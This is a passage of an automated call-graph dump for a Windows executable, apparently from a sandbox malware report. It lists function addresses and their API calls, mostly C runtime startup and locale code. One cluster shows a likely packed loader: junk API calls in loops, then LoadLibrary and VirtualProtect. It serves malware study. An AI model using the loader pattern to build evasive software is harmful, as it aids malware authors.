12483->12484 12485 41378b 12484->12485 12486 4098aa __crtGetStringTypeA_stat 65 API calls 12485->12486 12487 413793 12486->12487 12488 4098aa __crtGetStringTypeA_stat 65 API calls 12487->12488 12489 41379b 12488->12489 12490 4098aa __crtGetStringTypeA_stat 65 API calls 12489->12490 12491 4137a3 12490->12491 12492 4098aa __crtGetStringTypeA_stat 65 API calls 12491->12492 12493 4137ab 12492->12493 12494 4098aa __crtGetStringTypeA_stat 65 API calls 12493->12494 12495 4137b3 12494->12495 12496 4098aa __crtGetStringTypeA_stat 65 API calls 12495->12496 12497 4137bb 12496->12497 12498 4098aa __crtGetStringTypeA_stat 65 API calls 12497->12498 12499 4137c3 12498->12499 12500 4098aa __crtGetStringTypeA_stat 65 API calls 12499->12500 12501 4137d1 12500->12501 12502 4098aa __crtGetStringTypeA_stat 65 API calls 12501->12502 12503 4137dc 12502->12503 12504 4098aa __crtGetStringTypeA_stat 65 API calls 12503->12504 12505 4137e7 12504->12505 12506 4098aa __crtGetStringTypeA_stat 65 API calls 12505->12506 12507 4137f2 12506->12507 12508 4098aa __crtGetStringTypeA_stat 65 API calls 12507->12508 12509 4137fd 12508->12509 12510 4098aa __crtGetStringTypeA_stat 65 API calls 12509->12510 12511 413808 12510->12511 12512 4098aa __crtGetStringTypeA_stat 65 API calls 12511->12512 12513 413813 12512->12513 12514 4098aa __crtGetStringTypeA_stat 65 API calls 12513->12514 12515 41381e 12514->12515 12516 4098aa __crtGetStringTypeA_stat 65 API calls 12515->12516 12517 413829 12516->12517 12518 4098aa __crtGetStringTypeA_stat 65 API calls 12517->12518 12519 413834 12518->12519 12520 4098aa __crtGetStringTypeA_stat 65 API calls 12519->12520 12520->12435 12521->12364 12525 40def5 LeaveCriticalSection 12522->12525 12524 412148 12524->12008 12525->12524 12527 40a140 _LocaleUpdate::_LocaleUpdate 75 API calls 12526->12527 12528 412a11 12527->12528 12536 412844 12528->12536 12531 40a56c 12532 40a140 _LocaleUpdate::_LocaleUpdate 75 API calls 12531->12532 12533 40a57f 12532->12533 12624 40a1c7 12533->12624 12537 412865 GetStringTypeW 12536->12537 12538 412890 12536->12538 12539 412885 GetLastError 12537->12539 12540 41287d 12537->12540 12538->12540 12541 412977 12538->12541 12539->12538 12542 4128c9 MultiByteToWideChar 12540->12542 12559 412971 12540->12559 12564 412563 GetLocaleInfoA 12541->12564 12548 4128f6 12542->12548 12542->12559 12544 40b33b _CountryEnumProc@4 5 API calls 12546 411fb4 12544->12546 12546->12531 12547 4129c8 GetStringTypeExA 12552 4129e3 12547->12552 12547->12559 12549 40d2c2 _malloc 65 API calls 12548->12549 12553 41290b _memset __crtGetStringTypeA_stat 12548->12553 12549->12553 12551 412944 MultiByteToWideChar 12555 41296b 12551->12555 12556 41295a GetStringTypeW 12551->12556 12557 4098aa __crtGetStringTypeA_stat 65 API calls 12552->12557 12553->12551 12553->12559 12560 40a120 12555->12560 12556->12555 12557->12559 12559->12544 12561 40a12c 12560->12561 12562 40a13d 12560->12562 12561->12562 12563 4098aa __crtGetStringTypeA_stat 65 API calls 12561->12563 12562->12559 12563->12562 12565 412596 12564->12565 12568 412591 12564->12568 12595 418acd 12565->12595 12567 40b33b _CountryEnumProc@4 5 API calls 12569 4125aa 12567->12569 12568->12567 12569->12547 12569->12559 12570 4125ac 12569->12570 12571 4125ec GetCPInfo 12570->12571 12575 412676 12570->12575 12572 412661 MultiByteToWideChar 12571->12572 12573 412603 12571->12573 12572->12575 12579 41261c _strlen 12572->12579 12573->12572 12576 412609 GetCPInfo 12573->12576 12574 40b33b _CountryEnumProc@4 5 API calls 12577 41275e 12574->12577 12575->12574 12576->12572 12578 412616 12576->12578 12577->12547 12577->12559 12578->12572 12578->12579 12580 40d2c2 _malloc 65 API calls 12579->12580 12584 41264e _memset __crtGetStringTypeA_stat 12579->12584 12580->12584 12581 4126ab MultiByteToWideChar 12582 4126c3 12581->12582 12583 4126e2 12581->12583 12586 4126e7 12582->12586 12587 4126ca WideCharToMultiByte 12582->12587 12585 40a120 __freea 65 API calls 12583->12585 12584->12575 12584->12581 12585->12575 12588 4126f2 WideCharToMultiByte 12586->12588 12589 412706 12586->12589 12587->12583 12588->12583 12588->12589 12590 40affa __calloc_crt 65 API calls 12589->12590 12591 41270e 12590->12591 12591->12583 12592 412717 WideCharToMultiByte 12591->12592 12592->12583 12593 412729 12592->12593 12594 4098aa __crtGetStringTypeA_stat 65 API calls 12593->12594 12594->12583 12598 4193fb 12595->12598 12599 419414 12598->12599 12602 4191cc 12599->12602 12603 40a140 _LocaleUpdate::_LocaleUpdate 75 API calls 12602->12603 12605 4191e1 12603->12605 12604 4191f3 12606 40b128 __cftof_l 65 API calls 12604->12606 12605->12604 12610 419230 12605->12610 12607 4191f8 12606->12607 12608 409a6f __cftof_l 5 API calls 12607->12608 12613 418ade 12608->12613 12611 419275 12610->12611 12614 41278c 12610->12614 12612 40b128 __cftof_l 65 API calls 12611->12612 12611->12613 12612->12613 12613->12568 12615 40a140 _LocaleUpdate::_LocaleUpdate 75 API calls 12614->12615 12616 4127a0 12615->12616 12617 4127ad 12616->12617 12621 416fb8 12616->12621 12617->12610 12620 4129fe ___crtGetStringTypeA 89 API calls 12620->12617 12622 40a140 _LocaleUpdate::_LocaleUpdate 75 API calls 12621->12622 12623 4127d5 12622->12623 12623->12620 12625 40a1e8 LCMapStringW 12624->12625 12626 40a203 12624->12626 12625->12626 12627 40a20b GetLastError 12625->12627 12628 40a401 12626->12628 12629 40a25d 12626->12629 12627->12626 12631 412563 ___ansicp 89 API calls 12628->12631 12630 40a276 MultiByteToWideChar 12629->12630 12653 40a3f8 12629->12653 12638 40a2a3 12630->12638 12630->12653 12633 40a429 12631->12633 12632 40b33b _CountryEnumProc@4 5 API calls 12634 40a56a 12632->12634 12635 40a442 12633->12635 12636 40a51d LCMapStringA 12633->12636 12633->12653 12634->11965 12640 4125ac ___convertcp 72 API calls 12635->12640 12639 40a479 12636->12639 12637 40a2f4 MultiByteToWideChar 12642 40a3ef 12637->12642 12643 40a30d LCMapStringW 12637->12643 12645 40d2c2 _malloc 65 API calls 12638->12645 12650 40a2bc __crtGetStringTypeA_stat 12638->12650 12644 40a544 12639->12644 12649 4098aa __crtGetStringTypeA_stat 65 API calls 12639->12649 12641 40a454 12640->12641 12646 40a45e LCMapStringA 12641->12646 12641->12653 12647 40a120 __freea 65 API calls 12642->12647 12643->12642 12648 40a32e 12643->12648 12652 4098aa __crtGetStringTypeA_stat 65 API calls 12644->12652 12644->12653 12645->12650 12646->12639 12655 40a480 12646->12655 12647->12653 12651 40a337 12648->12651 12657 40a360 12648->12657 12649->12644 12650->12637 12650->12653 12651->12642 12654 40a349 LCMapStringW 12651->12654 12652->12653 12653->12632 12654->12642 12659 40a491 _memset __crtGetStringTypeA_stat 12655->12659 12661 40d2c2 _malloc 65 API calls 12655->12661 12656 40a3af LCMapStringW 12662 40a3c7 WideCharToMultiByte 12656->12662 12663 40a3e9 12656->12663 12658 40a37b __crtGetStringTypeA_stat 12657->12658 12660 40d2c2 _malloc 65 API calls 12657->12660 12658->12642 12658->12656 12659->12639 12665 40a4cf LCMapStringA 12659->12665 12660->12658 12661->12659 12662->12663 12664 40a120 __freea 65 API calls 12663->12664 12664->12642 12666 40a4eb 12665->12666 12667 40a4ef 12665->12667 12670 40a120 __freea 65 API calls 12666->12670 12669 4125ac ___convertcp 72 API calls 12667->12669 12669->12666 12670->12639 12671->11972 12672 40d867 12675 40d7f5 TlsGetValue 12672->12675 12676 40d80d 12675->12676 12677 40d82e GetModuleHandleW 12675->12677 12676->12677 12678 40d817 TlsGetValue 12676->12678 12679 40d844 12677->12679 12680 40d83e 12677->12680 12682 40d822 12678->12682 12683 40d826 12679->12683 12684 40d861 12679->12684 12681 40fcaf __crt_waiting_on_module_handle 2 API calls 12680->12681 12681->12679 12682->12677 12682->12683 12683->12684 12685 40d859 RtlEncodePointer 12683->12685 12685->12684 12686 409f99 12723 40eac8 12686->12723 12688 409fa5 GetStartupInfoW 12690 409fc8 12688->12690 12724 40de23 HeapCreate 12690->12724 12692 40a018 12726 40dc05 GetModuleHandleW 12692->12726 12696 40a029 __RTC_Initialize 12760 411b4a 12696->12760 12697 409f70 _fast_error_exit 65 API calls 12697->12696 12699 40a037 12700 40a043 GetCommandLineW 12699->12700 12701 40fcdf __amsg_exit 65 API calls 12699->12701 12775 411aed GetEnvironmentStringsW 12700->12775 12703 40a042 12701->12703 12703->12700 12704 40a052 12781 411a3f GetModuleFileNameW 12704->12781 12706 40a05c 12707 40a067 12706->12707 12708 40fcdf __amsg_exit 65 API calls 12706->12708 12785 411810 12707->12785 12708->12707 12711 40a078 12798 40fd9e 12711->12798 12712 40fcdf __amsg_exit 65 API calls 12712->12711 12714 40a07f 12715 40fcdf __amsg_exit 65 API calls 12714->12715 12716 40a08a __wwincmdln 12714->12716 12715->12716 12804 404f07 12716->12804 12719 40a0b9 12833 40ff7b 12719->12833 12722 40a0be ___BuildCatchObject 12723->12688 12725 40a00c 12724->12725 12725->12692 12822 409f70 12725->12822 12727 40dc20 12726->12727 12728 40dc19 12726->12728 12730 40dd88 12727->12730 12731 40dc2a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12727->12731 12729 40fcaf __crt_waiting_on_module_handle 2 API calls 12728->12729 12733 40dc1f 12729->12733 12847 40d91f 12730->12847 12734 40dc73 TlsAlloc 12731->12734 12733->12727 12736 40a01e 12734->12736 12737 40dcc1 TlsSetValue 12734->12737 12736->12696 12736->12697 12737->12736 12738 40dcd2 12737->12738 12836 40ff99 12738->12836 12741 40d7f5 __encode_pointer 6 API calls 12742 40dce2 12741->12742 12743 40d7f5 __encode_pointer 6 API calls 12742->12743 12744 40dcf2 12743->12744 12745 40d7f5 __encode_pointer 6 API calls 12744->12745 12746 40dd02 12745->12746 12747 40d7f5 __encode_pointer 6 API calls 12746->12747 12748 40dd12 12747->12748 12843 40de53 12748->12843 12751 40d870 __decode_pointer 5 API calls 12752 40dd33 12751->12752 12752->12730 12753 40affa __calloc_crt 65 API calls 12752->12753 12754 40dd4c 12753->12754 12754->12730 12755 40d870 __decode_pointer 5 API calls 12754->12755 12756 40dd66 12755->12756 12756->12730 12757 40dd6d 12756->12757 12758 40d95c __mtinit 65 API calls 12757->12758 12759 40dd75 GetCurrentThreadId 12758->12759 12759->12736 12864 40eac8 12760->12864 12762 411b56 GetStartupInfoA 12763 40affa __calloc_crt 65 API calls 12762->12763 12770 411b77 12763->12770 12764 411d95 ___BuildCatchObject 12764->12699 12765 411d12 GetStdHandle 12769 411cdc 12765->12769 12766 411d77 SetHandleCount 12766->12764 12767 40affa __calloc_crt 65 API calls 12767->12770 12768 411d24 GetFileType 12768->12769 12769->12764 12769->12765 12769->12766 12769->12768 12771 4161d2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12769->12771 12770->12764 12770->12767 12770->12769 12772 411c5f 12770->12772 12771->12769 12772->12764 12772->12769 12773 411c88 GetFileType 12772->12773 12774 4161d2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12772->12774 12773->12772 12774->12772 12776 411b02 12775->12776 12777 411afe 12775->12777 12778 40afb5 __malloc_crt 65 API calls 12776->12778 12777->12704 12779 411b23 _realloc 12778->12779 12780 411b2a FreeEnvironmentStringsW 12779->12780 12780->12704 12782 411a74 _wparse_cmdline 12781->12782 12783 40afb5 __malloc_crt 65 API calls 12782->12783 12784 411ab7 _wparse_cmdline 12782->12784 12783->12784 12784->12706 12786 411828 _wcslen 12785->12786 12788 40a06d 12785->12788 12787 40affa __calloc_crt 65 API calls 12786->12787 12791 41184c _wcslen 12787->12791 12788->12711 12788->12712 12789 4118b1 12790 4098aa __crtGetStringTypeA_stat 65 API calls 12789->12790 12790->12788 12791->12788 12791->12789 12792 40affa __calloc_crt 65 API calls 12791->12792 12793 4118d7 12791->12793 12796 411896 12791->12796 12865 418a44 12791->12865 12792->12791 12794 4098aa __crtGetStringTypeA_stat 65 API calls 12793->12794 12794->12788 12796->12791 12797 409947 __invoke_watson 10 API calls 12796->12797 12797->12796 12799 40fdac __IsNonwritableInCurrentImage 12798->12799 12874 40fbfc 12799->12874 12801 40fdca __initterm_e 12803 40fde9 __IsNonwritableInCurrentImage __initterm 12801->12803 12878 40b298 12801->12878 12803->12714 12805 404f63 12804->12805 12806 404f19 12804->12806 12978 404ae9 12805->12978 13006 409f4c 12806->13006 12811 404f2f 13015 40775a 12811->13015 12812 404f8f 12812->12719 12830 40ff4f 12812->12830 12820 404f5e 13059 409ce7 12820->13059 12823 409f83 12822->12823 12824 409f7e 12822->12824 12825 4101f9 __NMSG_WRITE 65 API calls 12823->12825 12826 4103a4 __FF_MSGBANNER 65 API calls 12824->12826 12827 409f8b 12825->12827 12826->12823 12828 40fd33 _fast_error_exit 2 API calls 12827->12828 12829 409f95 12828->12829 12829->12692 12831 40fe23 _doexit 65 API calls 12830->12831 12832 40ff60 12831->12832 12832->12719 12834 40fe23 _doexit 65 API calls 12833->12834 12835 40ff86 12834->12835 12835->12722 12858 40d867 12836->12858 12838 40ffa1 __init_pointers __initp_misc_winsig 12861 409d6b 12838->12861 12841 40d7f5 __encode_pointer 6 API calls 12842 40dcd7 12841->12842 12842->12741 12844 40de5e 12843->12844 12845 4161d2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12844->12845 12846 40dd1f 12844->12846 12845->12844 12846->12730 12846->12751 12848 40d929 12847->12848 12849 40d935 12847->12849 12850 40d870 __decode_pointer 5 API calls 12848->12850 12851 40d957 12849->12851 12852 40d949 TlsFree 12849->12852 12850->12849 12853 40deba DeleteCriticalSection 12851->12853 12854 40ded2 12851->12854 12852->12851 12855 4098aa __crtGetStringTypeA_stat 65 API calls 12853->12855 12856 40dee4 DeleteCriticalSection 12854->12856 12857 40def2 12854->12857 12855->12851 12856->12854 12857->12736 12859 40d7f5 __encode_pointer 6 API calls 12858->12859 12860 40d86e 12859->12860 12860->12838 12862 40d7f5 __encode_pointer 6 API calls 12861->12862 12863 409d75 12862->12863 12863->12841 12864->12762 12866 418a55 12865->12866 12867 418a5c 12865->12867 12866->12867 12869 418a88 12866->12869 12868 40b128 __cftof_l 65 API calls 12867->12868 12873 418a61 12868->12873 12871 418a70 12869->12871 12872 40b128 __cftof_l 65 API calls 12869->12872 12870 409a6f __cftof_l 5 API calls 12870->12871 12871->12791 12872->12873 12873->12870 12875 40fc02 12874->12875 12876 40d7f5 __encode_pointer 6 API calls 12875->12876 12877 40fc1a 12875->12877 12876->12875 12877->12801 12881 40b25c 12878->12881 12880 40b2a5 12880->12803 12882 40b268 ___BuildCatchObject 12881->12882 12889 40fd4b 12882->12889 12888 40b289 ___BuildCatchObject 12888->12880 12890 40dfcf __lock 65 API calls 12889->12890 12891 40b26d 12890->12891 12892 40b171 12891->12892 12893 40d870 __decode_pointer 5 API calls 12892->12893 12894 40b185 12893->12894 12895 40d870 __decode_pointer 5 API calls 12894->12895 12897 40b195 12895->12897 12896 40b218 12909 40b292 12896->12909 12897->12896 12912 4130ec 12897->12912 12899 40b1ff 12900 40d7f5 __encode_pointer 6 API calls 12899->12900 12903 40b20d 12900->12903 12901 40b1d7 12901->12896 12906 40b046 __realloc_crt 71 API calls 12901->12906 12907 40b1ed 12901->12907 12902 40b1b3 12902->12899 12902->12901 12925 40b046 12902->12925 12904 40d7f5 __encode_pointer 6 API calls 12903->12904 12904->12896 12906->12907 12907->12896 12908 40d7f5 __encode_pointer 6 API calls 12907->12908 12908->12899 12974 40fd54 12909->12974 12913 4130f8 ___BuildCatchObject 12912->12913 12914 413125 12913->12914 12915 413108 12913->12915 12917 413166 HeapSize 12914->12917 12920 40dfcf __lock 65 API calls 12914->12920 12916 40b128 __cftof_l 65 API calls 12915->12916 12919 41310d 12916->12919 12918 41311d ___BuildCatchObject 12917->12918 12918->12902 12921 409a6f __cftof_l 5 API calls 12919->12921 12922 413135 ___sbh_find_block 12920->12922 12921->12918 12930 413186 12922->12930 12927 40b04f 12925->12927 12928 40b08e 12927->12928 12929 40b06f Sleep 12927->12929 12934 412e56 12927->12934 12928->12901 12929->12927 12933 40def5 LeaveCriticalSection 12930->12933 12932 413161 12932->12917 12932->12918 12933->12932 12935 412e62 ___BuildCatchObject 12934->12935 12936 412e77 12935->12936 12937 412e69 12935->12937 12938 412e8a 12936->12938 12939 412e7e 12936->12939 12940 40d2c2 _malloc 65 API calls 12937->12940 12946 412ffc 12938->12946 12962 412e97 _realloc ___sbh_resize_block ___sbh_find_block 12938->12962 12941 4098aa __crtGetStringTypeA_stat 65 API calls 12939->12941 12948 412e71 ___BuildCatchObject _realloc 12940->12948 12941->12948 12942 41302f 12944 40ddfb _realloc 5 API calls 12942->12944 12943 40dfcf __lock 65 API calls 12943->12962 12947 413035 12944->12947 12945 413001 HeapReAlloc 12945->12946 12945->12948 12946->12942 12946->12945 12949 413053 12946->12949 12951 40ddfb _realloc 5 API calls 12946->12951 12954 413049 12946->12954 12950 40b128 __cftof_l 65 API calls 12947->12950 12948->12927 12949->12948 12952 40b128 __cftof_l 65 API calls 12949->12952 12950->12948 12951->12946 12953 41305c GetLastError 12952->12953 12953->12948 12956 40b128 __cftof_l 65 API calls 12954->12956 12968 412fca 12956->12968 12957 412f22 HeapAlloc 12957->12962 12958 412fcf GetLastError 12958->12948 12959 412f77 HeapReAlloc 12959->12962 12960 40e7e1 ___sbh_alloc_block 5 API calls 12960->12962 12961 412fe2 12961->12948 12964 40b128 __cftof_l 65 API calls 12961->12964 12962->12942 12962->12943 12962->12948 12962->12957 12962->12959 12962->12960 12962->12961 12963 40ddfb _realloc 5 API calls 12962->12963 12965 412fc5 12962->12965 12969 40e032 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 12962->12969 12970 412f9a 12962->12970 12963->12962 12966 412fef 12964->12966 12967 40b128 __cftof_l 65 API calls 12965->12967 12966->12948 12966->12953 12967->12968 12968->12948 12968->12958 12969->12962 12973 40def5 LeaveCriticalSection 12970->12973 12972 412fa1 12972->12962 12973->12972 12977 40def5 LeaveCriticalSection 12974->12977 12976 40b297 12976->12888 12977->12976 12979 404af6 12978->12979 12980 404b04 SetLastError GetTickCount 12979->12980 12981 404b34 12979->12981 12980->12979 12982 404b52 GetLogicalDriveStringsW 12981->12982 12983 404b63 LocalAlloc 12981->12983 12982->12981 12984 404bc7 12983->12984 12985 404b7f 12983->12985 12987 404be0 15 API calls 12984->12987 12988 404c91 12984->12988 12985->12984 12989 404b8e UnregisterWait GetNamedPipeHandleStateW InterlockedIncrement 12985->12989 13068 40492d 12985->13068 12987->12984 12990 404ca2 LoadLibraryW 12988->12990 12991 404cb2 GetModuleHandleA 12988->12991 12992 404cca 12988->12992 12989->12985 12990->12988 12991->12988 12993 404cf7 12992->12993 13065 4049ea LoadLibraryA 12992->13065 13071 4048af 12993->13071 12996 404d0d 12997 404d1f InterlockedDecrement 12996->12997 12998 404d2b 12996->12998 12999 404d3c 12996->12999 12997->12996 12998->12996 13067 404604 LoadLibraryA 12999->13067 13001 404d41 13002 404d51 20 API calls 13001->13002 13003 404e63 13001->13003 13002->13003 13004 404e71 13 API calls 13003->13004 13005 404efc 13003->13005 13004->13005 13005->12812 13085 409ec6 13006->13085 13008 404f28 13009 409e93 MoveFileA 13008->13009 13010 409eb0 13009->13010 13011 409ea8 GetLastError 13009->13011 13012 409ec2 13010->13012 13111 40b14e 13010->13111 13011->13010 13012->12811 13016 407764 __EH_prolog numpunct 13015->13016 13119 406971 13016->13119 13021 4086b4 13022 4086be __EH_prolog 13021->13022 13323 4084fd 13022->13323 13027 4085af 13028 4085b9 __EH_prolog 13027->13028 13616 407fae 13028->13616 13030 4085d4 13031 4045b4 std::ios_base::getloc 2 API calls 13030->13031 13040 40860e 13030->13040 13033 4085f8 13031->13033 13032 407736 73 API calls 13034 408695 13032->13034 13622 4075e6 13033->13622 13640 408572 13034->13640 13038 404f59 13041 409d7c 13038->13041 13039 4044af Mailbox 2 API calls 13039->13040 13040->13032 13042 409da2 13041->13042 13043 409d9b 13041->13043 13700 41003c 13042->13700 13044 4101f9 __NMSG_WRITE 65 API calls 13043->13044 13044->13042 13048 409e8b 13724 40ff65 13048->13724 13050 409db3 _memset 13050->13048 13052 409e4b SetUnhandledExceptionFilter UnhandledExceptionFilter 13050->13052 13052->13048 13054 409eb0 13056 409ec2 13054->13056 13057 40b14e __dosmaperr 65 API calls 13054->13057 13055 409ea8 GetLastError 13055->13054 13056->12820 13058 409ebc 13057->13058 13058->12820 13060 409cf3 ___BuildCatchObject 13059->13060 13061 40dabc __getptd 65 API calls 13060->13061 13062 409cf8 13061->13062 13063 409d7c _abort 69 API calls 13062->13063 13064 409d1a ___BuildCatchObject 13063->13064 13064->12805 13066 404acc VirtualProtect 13065->13066 13066->12992 13067->13001 13069 4049b9 13068->13069 13070 40493f 11 API calls 13068->13070 13069->12985 13070->13069 13072 4048d2 13071->13072 13073 4048c7 MoveFileWithProgressW 13071->13073 13074 4048ec CopyFileExA 13072->13074 13075 404901 FindNextFileA EnumSystemCodePagesA 13072->13075 13077 404926 13072->13077 13078 4046e7 13072->13078 13073->13072 13074->13072 13075->13072 13077->12996 13081 4046f4 13078->13081 13079 404748 GetConsoleAliasExesLengthW 13079->13081 13080 40476b FindNextVolumeW SetLocaleInfoA SetSystemTimeAdjustment InterlockedDecrement LocalFlags 13080->13081 13081->13079 13081->13080 13082 4047d8 VerLanguageNameA 13081->13082 13083 4047fd GetComputerNameW GetVolumeInformationA ReadConsoleA 13081->13083 13084 4048a0 13081->13084 13082->13081 13083->13081 13084->13072 13086 409ed2 ___BuildCatchObject 13085->13086 13087 409ee0 13086->13087 13088 409efd _vscanf 13086->13088 13089 40b128 __cftof_l 65 API calls 13087->13089 13096 4104f5 13088->13096 13090 409ee5 13089->13090 13091 409a6f __cftof_l 5 API calls 13090->13091 13094 409ef5 ___BuildCatchObject 13091->13094 13093 409f09 _vscanf 13101 409f3d 13093->13101 13094->13008 13097 410502 13096->13097 13098 410518 EnterCriticalSection 13096->13098 13099 40dfcf __lock 65 API calls 13097->13099 13098->13093 13100 41050b 13099->13100 13100->13093 13102 409f42 _vscanf 13101->13102 13105 410563 13102->13105 13104 409f49 13104->13094 13106 410573 13105->13106 13107 410586 LeaveCriticalSection 13105->13107 13110 40def5 LeaveCriticalSection 13106->13110 13107->13104 13109 410583 13109->13104 13110->13109 13116 40b13b 13111->13116 13113 40b159 _realloc 13114 40b128 __cftof_l 65 API calls 13113->13114 13115 409ebc 13114->13115 13115->12811 13117 40da43 __getptd_noexit 65 API calls 13116->13117 13118 40b140 13117->13118 13118->13113 13120 406987 numpunct 13119->13120 13129 40659a 13120->13129 13122 40698e 13123 407555 13122->13123 13124 404f3a 13123->13124 13125 407572 13123->13125 13124->13021 13126 407580 13125->13126 13178 4070e5 13125->13178 13186 405d3c 13126->13186 13132 405d5d 13129->13132 13131 4065a7 13131->13122 13135 4053ad 13132->13135 13136 4053ba 13135->13136 13137 4053cc 13135->13137 13145 4097ee 13136->13145 13137->13136 13138 4053d8 13137->13138 13157 4042d0 13138->13157 13144 4053f0 13148 4097f8 13145->13148 13146 40d2c2 _malloc 65 API calls 13146->13148 13147 4053c7 13147->13131 13148->13146 13148->13147 13149 40ddfb _realloc 5 API calls 13148->13149 13153 409814 std::bad_alloc::bad_alloc 13148->13153 13149->13148 13150 40983a 13163 4053f1 13150->13163 13153->13150 13155 40b298 _AtModuleExit 72 API calls 13153->13155 13154 409853 __CxxThrowException@8 RaiseException 13156 409852 13154->13156 13155->13150 13172 4090e1 13157->13172 13160 409853 13161 409888 RaiseException 13160->13161 13162 40987c 13160->13162 13161->13144 13162->13161 13166 409151 13163->13166 13167 4053ff 13166->13167 13168 409171 _strlen 13166->13168 13167->13154 13168->13167 13169 40d2c2 _malloc 65 API calls 13168->13169 13170 409184 13169->13170 13170->13167 13171 40d20b _strcpy_s 65 API calls 13170->13171 13171->13167 13173 4042df 13172->13173 13174 4090fa _strlen 13172->13174 13173->13160 13175 40d2c2 _malloc 65 API calls 13174->13175 13176 409109 13175->13176 13176->13173 13177 40d20b _strcpy_s 65 API calls 13176->13177 13177->13173 13179 4070ef __EH_prolog 13178->13179 13189 4070b4 13179->13189 13184 409853 __CxxThrowException@8 RaiseException 13185 40711d 13184->13185 13313 40536b 13186->13313 13190 4070c2 numpunct 13189->13190 13198 4064eb 13190->13198 13192 4070d4 13202 406ecd 13192->13202 13195 406f28 13304 406eec 13195->13304 13199 406515 std::locale::_Locimp::~_Locimp 13198->13199 13200 4064f7 13198->13200 13199->13192 13200->13199 13206 405d6e 13200->13206 13203 406edb std::_Locinfo::_Locinfo_ctor 13202->13203 13225 406dbc 13203->13225 13205 406ee7 13205->13195 13207 405d77 std::locale::_Locimp::~_Locimp 13206->13207 13210 405439 13207->13210 13213 404341 13210->13213 13216 4092bb 13213->13216 13215 404355 13215->13199 13219 4092cf _memset 13216->13219 13221 4092cb _realloc 13216->13221 13217 4092d4 13218 40b128 __cftof_l 65 API calls 13217->13218 13224 4092d9 13218->13224 13219->13217 13219->13221 13222 40931e 13219->13222 13220 409a6f __cftof_l 5 API calls 13220->13221 13221->13215 13222->13221 13223 40b128 __cftof_l 65 API calls 13222->13223 13223->13224 13224->13220 13226 406dcc std::_Locinfo::_Locinfo_ctor 13225->13226 13227 406dd2 std::locale::_Locimp::~_Locimp 13226->13227 13228 406de7 13226->13228 13234 406d23 13227->13234 13247 4069dc 13228->13247 13230 406de5 std::locale::_Locimp::~_Locimp 13230->13205 13232 406df1 std::locale::_Locimp::~_Locimp 13232->13230 13233 405d6e std::locale::_Locimp::~_Locimp 65 API calls 13232->13233 13233->13230 13235 406d33 std::_Locinfo::_Locinfo_ctor 13234->13235 13237 406d3f std::_Locinfo::_Locinfo_ctor 13235->13237 13256 408f98 13235->13256 13238 406d70 13237->13238 13239 406d5a 13237->13239 13241 4069dc std::_Locinfo::_Locinfo_ctor 73 API calls 13238->13241 13266 406539 13239->13266 13245 406d78 std::locale::_Locimp::~_Locimp 13241->13245 13242 406d64 13244 406539 std::_Locinfo::_Locinfo_ctor 73 API calls 13242->13244 13243 406d6e std::locale::_Locimp::~_Locimp 13243->13230 13244->13243 13245->13243 13246 405d6e std::locale::_Locimp::~_Locimp 65 API calls 13245->13246 13246->13243 13249 4069e8 std::_Locinfo::_Locinfo_ctor 13247->13249 13248 4069f4 13251 4069f9 13248->13251 13254 406a06 13248->13254 13249->13248 13285 408f60 13249->13285 13293 4066c0 13251->13293 13253 406a04 std::locale::_Locimp::~_Locimp 13253->13232 13254->13253 13255 4064eb std::locale::_Locimp::~_Locimp 65 API calls 13254->13255 13255->13253 13257 408fa4 __EH_prolog3 13256->13257 13258 4070b4 numpunct 73 API calls 13257->13258 13259 408fb1 13258->13259 13272 408f11 13259->13272 13262 409853 __CxxThrowException@8 RaiseException 13263 408fcf 13262->13263 13275 40711e 13263->13275 13267 406549 13266->13267 13269 40654e std::locale::_Locimp::~_Locimp 13266->13269 13268 408f98 std::_Locinfo::_Locinfo_ctor 73 API calls 13267->13268 13268->13269 13271 406584 std::locale::_Locimp::~_Locimp 13269->13271 13281 405d92 13269->13281 13271->13242 13273 406eec std::bad_exception::bad_exception 73 API calls 13272->13273 13274 408f21 13273->13274 13274->13262 13276 407128 __EH_prolog 13275->13276 13277 409151 std::exception::exception 65 API calls 13276->13277 13278 407139 13277->13278 13279 406ea9 std::bad_exception::bad_exception 73 API calls 13278->13279 13280 40714f 13279->13280 13280->13237 13282 405d9b std::locale::_Locimp::~_Locimp 13281->13282 13283 405454 std::_Locinfo::_Locinfo_ctor 65 API calls 13282->13283 13284 405db2 13283->13284 13284->13271 13286 408f6c __EH_prolog3 13285->13286 13287 4070b4 numpunct 73 API calls 13286->13287 13288 408f79 13287->13288 13289 406f28 std::bad_exception::bad_exception 73 API calls 13288->13289 13290 408f89 13289->13290 13291 409853 __CxxThrowException@8 RaiseException 13290->13291 13292 408f97 13291->13292 13294 4066ca std::_Locinfo::_Locinfo_ctor __EH_prolog 13293->13294 13301 405c9c 13294->13301 13296 40676b 13298 4064eb std::locale::_Locimp::~_Locimp 65 API calls 13296->13298 13297 406723 std::locale::_Locimp::~_Locimp 13297->13296 13300 405d6e std::locale::_Locimp::~_Locimp 65 API calls 13297->13300 13299 406776 std::locale::_Locimp::~_Locimp 13298->13299 13299->13253 13300->13296 13302 40532c std::_Locinfo::_Locinfo_ctor 73 API calls 13301->13302 13303 405ca9 13302->13303 13303->13297 13305 406ef6 __EH_prolog std::bad_exception::bad_exception 13304->13305 13308 406ea9 13305->13308 13309 4064eb std::locale::_Locimp::~_Locimp 65 API calls 13308->13309 13310 406eb8 13309->13310 13311 406d23 std::_Locinfo::_Locinfo_ctor 73 API calls 13310->13311 13312 406ec6 13311->13312 13312->13184 13314 405388 13313->13314 13315 405378 13313->13315 13314->13315 13316 405394 13314->13316 13317 4097ee std::_Mutex::_Mutex 73 API calls 13315->13317 13318 4042d0 std::_Locinfo::_Locinfo_ctor 65 API calls 13316->13318 13319 405383 13317->13319 13320 40539e 13318->13320 13319->13124 13321 409853 __CxxThrowException@8 RaiseException 13320->13321 13322 4053ac 13321->13322 13324 408507 __EH_prolog 13323->13324 13335 408495 13324->13335 13329 406995 13330 40699f __EH_prolog 13329->13330 13596 405ce1 13330->13596 13332 4069ab 13604 4065c9 13332->13604 13334 404f49 13334->13027 13336 40849f __EH_prolog 13335->13336 13343 407f20 13336->13343 13339 4051be 13340 4051c8 __EH_prolog 13339->13340 13341 405212 13340->13341 13342 408d23 std::ios_base::_Addstd 2 API calls 13340->13342 13341->13329 13342->13341 13352 4074f0 13343->13352 13347 407f40 13348 407f52 13347->13348 